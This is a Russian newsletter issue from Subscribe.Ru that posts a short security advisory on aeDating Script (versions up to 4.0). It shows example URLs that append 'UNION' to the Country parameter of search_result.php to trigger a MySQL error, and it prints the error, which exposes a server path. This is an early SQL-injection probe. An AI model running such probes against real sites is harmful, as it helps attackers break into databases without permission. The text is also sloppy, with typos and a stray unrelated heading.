Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпуск по безопасности.


Информационный Канал Subscribe.Ru

Опасные продукты:
Avocents COM
Безопансность
ПО: aeDating Script
Версия: <=4.0

Описание:
Найдена уязвимость в он-лайн программном обеспечении сайтов для знакомств - aeDating Script, которая может быть использована для поиска soulmate в этом сервисе.
Использование:
www.[target].com/search.php просто выбираем одну страну и нажимаем на кнопку 'Search', после этих действий вы можете увидеть что-то такое:
www.target.com/search_result.php?Sex=male&LookingFor=female&DateOfBirth_start=18&DateOfBirth_end=40&Country%5B%5D=0
И для того, что бы создать ошибку скрипта, вам нужно добавить что-нибудь в конец ссылки, например UNION:
www.target.com/search_result.php?Sex=male&LookingFor=female&DateOfBirth_start=18&DateOfBirth_end=40&Country%5B%5D=0UNION
И в результате получаем:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/public_html/search_result.php on line 370
ERROR Database access error
Если Вам нравится эта рассылка и Вы пользуетесь сведениями из неё, то можете поддержать автора, перечислив небольшое вознаграждение на R474348938531 или Z451490294903. Связаться со мной можно по ICQ 273214003.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки
Отписаться
Вспомнить пароль

В избранное